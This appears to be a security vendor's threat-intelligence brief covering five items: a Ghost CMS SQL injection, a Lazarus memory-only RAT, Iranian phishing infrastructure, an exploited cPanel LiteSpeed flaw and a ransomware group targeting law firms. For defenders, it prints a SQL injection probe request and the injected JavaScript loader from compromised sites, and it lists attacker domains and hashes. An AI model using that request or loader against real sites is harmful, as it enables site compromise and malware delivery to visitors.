EXECUTIVE SUMMARY
This article is to inform our partners and clients on the various happenings within the cybersecurity space. That includes items such as relevant breaches, emerging vulnerabilities, research, threat actor movement, and what you need to do as an organization to mitigate a future threat.
KEY TAKEAWAYS
- A SQL injection vulnerability in Ghost CMS is being leveraged to power large-scale ClickFix malware campaigns.
- A subgroup of the Lazarus APT has introduced a new fileless remote access trojan designed to evade traditional detection methods.
- Nimbus Manticore is continuing its targeted campaigns against aerospace and technology organizations.
- A vulnerability in the cPanel LiteSpeed plugin (CVE-2026-48172) is being actively exploited in the wild.
- A ransomware operation known as Silent is specifically targeting law firms in focused intrusion campaigns.
1. Ghost CMS SQL Injection Flaw Fuels Large Scale ClickFix Campaigns
SUMMARY
A large-scale campaign is exploiting a critical SQL injection vulnerability in Ghost CMS to inject malicious JavaScript, leading to ClickFix attacks on over 700 domains. Despite an available patch, affected sites include prestigious universities and tech companies.
Category
Known Exploited Vulnerabilities
Industry
Technology, Public Sector and Government Administration, Education
Sources
https://www.sentinelone.com/vulnerability-database/cve-2026-26980/
Internal OSec Research
ANALYST COMMENTS
A large scale campaign is exploiting CVE-2026-26980, a SQL injection vulnerability in Ghost CMS, to inject malicious JavaScript and deliver ClickFix attacks across more than 700 websites, including DuckDuckGo and Harvard. The flaw affects Ghost versions 3.24.0 through 6.19.0, allowing attackers to access admin API keys and modify content. Despite a patch being available since February 19, many sites remain unpatched or have been re infected. Multiple public proof of concept exploits are available, and the highest concentration of exposed hosts was observed in the United States.
# Request when actively checking for vulnerability, note the SQL string:
GET /ghost/api/content/tags/?key=<redacted>&filter=slug:%5B'%20O R%20(1=1)%20T H E N%20(S E L E C T%20abs(-9223372036854775808))%20WHEN%20slug=',news%5D&limit=all HTTP/1.1
Host: localhost:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-aliveACTIONABLE GUIDANCE
Outdated versions of Ghost CMS should be updated to ensure that they are not vulnerable to this issue. Monitoring efforts should focus on detecting SQL injection artifacts in GET requests, specifically when using the endpoint /ghost/api/content/tags/?key=...&filter=slug:<SQL STRING url encoded>. Analysis of the compromised sites associated with this campaign found the following malicious JavaScript injected code within the Ghost CMS instances:
# Injected malicious code:
<script>
(function(){
var a = location;
var b = document.head || document.getElementsByTagName("head")[0];
var c = "script";
var d = atob("<base64 string>");
d += d.indexOf("?") > -1 ? "&" : "?";
d += a.search.substring(1);
c = document.createElement(c);
c.src = d;
c.id = btoa(a.origin);
b.appendChild(c);
})();
</script>2. Lazarus APT Subgroup Unveils Fileless RAT Designed to Evade Detection
SUMMARY
The North Korea-linked Lazarus APT group has developed a sophisticated memory-only RAT called RemotePE, which operates entirely in memory and uses environmental keying to evade detection, allowing for long-term observation and potential high-impact operations.
Category
State-Sponsored Espionage
Industry
Finance, Business Services
Sources
https://blog.fox-it.com/2026/05/22/remotepe-the-lazarus-rat-that-lives-in-memory/
https://www.chainalysis.com/blog/lessons-from-the-drift-hack/
Internal OSec Research
ANALYST COMMENTS
The North Korea linked Lazarus subgroup Citrine Sleet has developed a memory resident Remote Access Trojan known as RemotePE. The malware uses a three stage infection chain consisting of DPAPILoader, RemotePELoader, and RemotePE, leveraging DPAPI encryption, environmental keying, and anti analysis techniques to create victim specific payloads and evade detection.
While available samples date back to 2023 and 2024, several command and control indicators remain active, reflecting Lazarus' long standing practice of reusing infrastructure and tooling. The campaign primarily targets financial and cryptocurrency organizations through highly targeted social engineering operations.
ACTIONABLE GUIDANCE
The actor is known for prolonged social engineering campaigns targeting personnel within financial and cryptocurrency organizations. In observed attacks, victims are lured into meetings where the threat actor simulates an audio or technical issue and convinces them to install a malicious file. Organizations can reduce risk by restricting software installation privileges to authorized personnel.
Detection efforts should focus on POST requests to /channel endpoints, particularly those using the Microsoft-Delivery-Optimization/10 user agent when communicating with non Microsoft infrastructure.
3. Nimbus Manticore Continued Campaign Movements Against Aerospace and Technology Orgs
SUMMARY
During Operation Epic Fury, the Iran-linked cyber threat actor Nimbus Manticore accelerated its cyberattacks by leveraging AI-assisted malware development. The campaign introduced new backdoors like MiniFast, and leveraged novel tactics such as SEO poisoning and trojanized Zoom installers to target organizations across multiple sectors and regions.
Category
Threat Actor Activities
Industry
Aviation / Aerospace, Telecommunications, Public Sector and Government Administration, Technology
Sources
https://unit42.paloaltonetworks.com/tracking-iran-apt-screening-serpens/
https://unit42.paloaltonetworks.com/tracking-iran-apt-screening-serpens/
Internal OSec Research
ANALYST COMMENTS
During Operation Epic Fury, the Iran linked threat actor Nimbus Manticore used AI assisted malware, fake Zoom installers, and SEO poisoning to target defense, aviation, and telecommunications organizations. The campaign introduced two new backdoors, MiniJunk and MiniFast, and commonly relied on SEO poisoning, fake software downloads, and employment themed phishing lures such as getsqldeveloper[.]com and the "Dream Job" campaign. Infrastructure associated with the SEO poisoning activity was offline at the time of analysis.
# SSL Certs used to Sign Binaries
Gray Matter Software S.R.L.
Kirubel Kerie Negeya
# Domains used for phishing and SEO landing pages
Domains (stale)
business-startup[.]org
business-startup.azurewebsites[.]net
businessstartup.azurewebsites[.]net
buisness-centeral.azurewebsites[.]net
buisness-centeral-transportation.azurewebsites[.]net
buisness-centeral-transportation[.]com
licencemanagers.azurewebsites[.]net
licencesupporting.azurewebsites[.]net
peerdistsvcmanagers.azurewebsites[.]net
nanomatrix.azurewebsites[.]net
PremierHealthAdvisory[.]com
PremierHealthAdvisory[.]azurewebsites.net
Premier-HealthAdvisory[.]azurewebsites.net
ramiltonsfinance[.]com
ramiltonsfinance.azurewebsites[.]net
ramiltons-finance.azurewebsites[.]net
globalitconsultants.azurewebsites[.]net
globalit-consultants.azurewebsites[.]net
global-it-consultants.azurewebsites[.]net
global-it-checkers.azurewebsites[.]net
global-it-checkbusiness.azurewebsites[.]net
global-check-itbusiness.azurewebsites[.]net
global-check-business-it.azurewebsites[.]net
globalbusiness-checkers-it.azurewebsites[.]net
getsqldeveloper[.]com (currently down)
# Sha256 Hashes
10fd541674adadfbba99b54280f7e59732746faf2b10ce68521866f737f1e46d
eee657ffdb2af8ed6412221e7d5fbf4f5742f2ac2c88f43f12db46af0697de71
781605ce9d4a9869e846f6c9657d71437cb6240ab27ffbc4cd550c0e06996690
2c214494fd0bad31473ca8adce78a4f50847876584571e66aadeae70827ec2dc
f08b17856616d66492a24dced27f788e235f35f42fa7cd10f315000d3a2f4c03
a57ffb819fe8d98ff925c5d7b239598fe302acf5a13193d7a535040a71298fdf
63d0d3c4a7f71bdbca720903d6a99b832089cc093c64d2938e7e001e56c17ab4
74882085db2088356ed7f72f01e0404a0a98cda88ef56fb15ce74c1f36b26d27
bc3b44154518c5794ce639108e7b9c5fecb0c189607a26de1aaed518d890c7ad
ecaf493c320d201d285ef5f61d75744216e47cf1115b4af528f9a78883cc446e
44f4f7aca7f1d9bfdaf7b3736934cbe19f851a707662f8f0b0c49b383e054250
0db36a04d304ad96f9e6f97b531934594cd95a5cea9ff2c9af249201089dc864
485f182f7b74ea4013b2539275a95d21e3a9bf0082c331937af9353a324b36f3
64530d7e6ee30e4a66d9eeed6b8595c33fd72f5f73409133ca40539e5695df4c
332ba2f0297dfb1599adecc3e9067893e7cf243aa23aedce4906a4c480574c17
9e4a658e6d831c9e9bdfe11884a75b7c64812ed0a80e8495ddf6b316505acac1
43dc62cef52ebdd69e79f10015b3e13890f26c058325c0ff139c70f8d8eadcfa
8808c794c24367438f183e4be941876f1d3ecd0c8d2eb43b10d2380841d2283b
5c3362d20229597d11380f56d1f2eb39647fb6afad7be8392a7abcd18dff12f8
0291ef318576953f7f3fe287e7775ed1d7c3206119dc7b9cd6d85c02779e6e40
d4a7e9f107fe40c1a5d0139c6c6e25bf6bf57f61feff090bee28f476bb3cc3c2
38bd137c672bd58d08c4f0502f993a6561e2c3411773d1ae57ee0151a0a9d11d
f54cd38632ac9da3af3533ae93e92625cbcb04df521dbf1b6acfaa81218f9e8c
b19e06da580cf91691eda066ac9ee4b09c6e5dc26c367af12660fe1f9306eec4
9cf029daca89523d917dafed0568d11d00e45ec96b5b90b4a1f7fd4018c7da84
a13ba3c5aff46e9daf2d23df4b3e3d49dc7236c207c56f0a1433051f3450d441
dfa1e3137a032ee8561a1cd5e1a0f71a10bebb36aef7c336c878638a9c1239ee
B19e06da580cf91691eda066ac9ee4b09c6e5dc26c367af12660fe1f9306eec4 Current visibility suggests the actor may be rotating infrastructure, shifting operational objectives during the current ceasefire period, or preparing for future campaigns. Developments related to the 2026 blockade and ceasefire may also influence future targeting and victim selection. Despite these potential changes, the actor is likely to continue to use tactics like SEO poisoning and signed binaries in future attacks.
ACTIONABLE GUIDANCE
Organizations within the telecommunications, aviation, government, and public administration sectors face the greatest risk from this threat actor. Users should verify the source of files before execution, while administrators should restrict unapproved software and monitor for known campaign infrastructure. The actor frequently uses signed binaries, making certificate based detection valuable. Organizations matching the targeting profile should add known indicators to blocklists and conduct retrospective hunting, particularly U.S. aviation organizations.
4. cPanel Litespeed Plugin Flaw CVE-2026-48172 Exploited in the Wild
SUMMARY
The U.S. Cybersecurity and Infrastructure Security Agency has mandated U.S. federal agencies to secure their servers against a critical privilege escalation vulnerability in the LiteSpeed cPanel user-end plugin. The flaw allows remote attackers to execute arbitrary scripts with root privileges and is being actively prioritized for remediation.
Category
Known Exploited Vulnerabilities
Industry
Technology, Public Sector and Government Administration
Sources
https://nvd.nist.gov/vuln/detail/CVE-2026-48172
ANALYST COMMENTS
ISA has directed federal agencies to address CVE-2026-48172, a critical privilege escalation vulnerability affecting the LiteSpeed cPanel user end plugin that is being actively exploited. The flaw allows remote attackers with valid credentials to execute arbitrary scripts with root privileges through the /execute/Litespeed/redisAble.php endpoint. LiteSpeed has released updates, and organizations should validate exposure and review logs for signs of compromise.
A public proof of concept is available, increasing the likelihood of broader exploitation.
ACTIONABLE GUIDANCE
Organizations should apply the vendor provided patch as soon as possible. Active exploitation will make GET requests to the endpoint /execute/Litespeed/redisAble.php and will contain Linux-like commands for executing code on the underlying file system. The publicly available PoC uses the command shown above to establish a reverse shell connection to a target host Ultimately, however, defenders should look for the presence of Linux-like commands set in the redis_server parameter of the vulnerable endpoint. However, defenders should expect variations in command execution. Detection efforts should focus on requests targeting the vulnerable endpoint, particularly those containing encoded payloads or suspicious command execution attempts.
5. Silent Ransomware Targeting Law Firms
SUMMARY
The Silent Ransom Group (SRG), a cyber extortion group formerly associated with the Conti ransomware syndicate, is increasingly targeting U.S. law firms. The group uses phishing, fake IT support calls, and in-person visits to steal sensitive data for extortion purposes.
Category
Ransomware
Industry
Legal and Law, Business Services
Sources
https://therecord.media/fbi-warns-hackers-visit-law-firms-to-steal-data
https://www.ic3.gov/CSA/2026/260526.pdf
Internal OSec Research
ANALYST COMMENTS
The Silent Ransom Group (SRG), also tracked as Luna Moth, Chatty Spider, and UNC3753, is a cyber extortion group linked to the former Conti ransomware syndicate that is actively targeting U.S. law firms. The group relies on phishing, voice phishing, IT impersonation, and legitimate remote management tools to gain access and steal sensitive data. Once inside a network, SRG leverages tools such as WinSCP, Rclone, and credential reuse to expand access and facilitate extortion.
ACTIONABLE GUIDANCE
Users should verify the identity of anyone claiming to be IT support before granting access or following instructions. Organizations should restrict remote management software, reduce credential theft opportunities, and limit access to administrative tools.
Additional defenses include restricting scripting and command line tools, limiting removable media, enforcing multifactor authentication, and disabling unnecessary remote access services. While U.S. law firms face elevated risk from SRG, the threat is comparable to other ransomware and extortion groups targeting the legal sector.
Get the Complete Report
The full Intelligence Desk brief includes exhaustive IOC lists, YARA detection rules, detailed remediation playbooks, and OSec's original threat research. Delivered weekly to our partners and clients. REQUEST ACCESS